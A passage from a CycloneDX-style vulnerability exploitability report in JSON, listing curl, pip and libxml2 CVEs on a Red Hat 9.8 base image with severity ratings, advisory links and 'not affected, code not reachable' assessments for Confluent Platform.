          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6276",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        319
      ],
      "description": "Using libcurl, when a custom `Host:` header is first set for an HTTP request\nand a second request is subsequently done using the same *easy handle* but\nwithout the custom `Host:` header set, the second request would use stale\ninformation and pass on cookies meant for the first host in the second\nrequest. Leak them.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6276"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2jc6-hc33-hv48"
        },
        {
          "url": "https://hackerone.com/reports/3671818"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6357",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        829
      ],
      "description": "pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6357"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/27/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6357"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/b369bfc96cc524e00c267e1693290e6599c36bad"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13923"
        },
        {
          "url": "https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/#security-fixes"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6357"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6357"
        }
      ],
      "published": "2026-04-27T15:16:20+00:00",
      "updated": "2026-06-17T11:00:42+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6429",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, libcurl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6429"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6429"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2pvc-5qw9-h3ph"
        },
        {
          "url": "https://hackerone.com/reports/3677759"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6653",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416,
        611
      ],
      "description": "Use After Free in libxml2's xmlParseInternalSubset from GNOME libxml2 version 2.9.11 to 2.11.0 allows a remote attacker to cause a denial-of-service via maliciously crafted XML input with improper entity resolution handling.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6653"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6653"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/2141260"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/work_items/1058"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6653"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8456-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6653"
        }
      ],
      "published": "2026-06-22T14:17:51+00:00",
      "updated": "2026-07-14T16:00:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6732",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        843
      ],
      "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.",
      "advisories": [
        {
